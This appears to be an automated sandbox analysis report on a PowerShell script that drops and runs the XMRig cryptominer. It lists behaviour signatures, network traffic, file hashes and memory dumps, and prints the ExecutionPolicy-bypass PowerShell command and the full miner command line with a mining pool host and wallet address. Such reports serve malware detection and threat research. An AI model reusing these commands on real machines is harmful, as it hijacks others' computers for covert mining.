| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2620 wrote to memory of 3164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2620 wrote to memory of 3164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3772,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4016 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1008,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=3884 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.246.116.51.in-addr.arpa | udp |
Files
memory/2620-0-0x00007FF992653000-0x00007FF992655000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgmmjrar.ftt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2620-10-0x0000023984300000-0x0000023984322000-memory.dmp
memory/2620-11-0x00007FF992650000-0x00007FF993111000-memory.dmp
memory/2620-12-0x00007FF992650000-0x00007FF993111000-memory.dmp
memory/2620-14-0x00007FF992650000-0x00007FF993111000-memory.dmp
memory/2620-15-0x000002399CF40000-0x000002399CF52000-memory.dmp
memory/2620-16-0x00000239843B0000-0x00000239843BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3164-47-0x00000247E4040000-0x00000247E4060000-memory.dmp
memory/3164-48-0x00000247E5840000-0x00000247E5860000-memory.dmp
memory/3164-49-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-50-0x00000247E5860000-0x00000247E5880000-memory.dmp
memory/3164-51-0x00000247E5880000-0x00000247E58A0000-memory.dmp
memory/3164-52-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/2620-53-0x00007FF992653000-0x00007FF992655000-memory.dmp
memory/2620-54-0x00007FF992650000-0x00007FF993111000-memory.dmp
memory/2620-56-0x00007FF992650000-0x00007FF993111000-memory.dmp
memory/3164-55-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-58-0x00000247E5860000-0x00000247E5880000-memory.dmp
memory/3164-57-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-59-0x00000247E5880000-0x00000247E58A0000-memory.dmp
memory/3164-60-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-61-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-62-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-63-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-64-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-65-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-66-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-67-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-68-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-69-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-70-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-71-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-72-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-73-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-74-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-75-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-76-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-77-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-78-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-79-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-80-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-81-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-82-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-83-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-84-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-85-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-86-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-87-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-88-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-89-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-90-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-91-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-92-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-93-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-94-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-95-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-96-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-97-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-98-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-99-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-100-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-101-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-102-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-103-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-104-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-105-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-106-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-107-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-108-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-109-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-110-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-111-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-112-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-113-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-114-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-115-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-116-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-117-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp
memory/3164-118-0x00007FF668EB0000-0x00007FF669AE3000-memory.dmp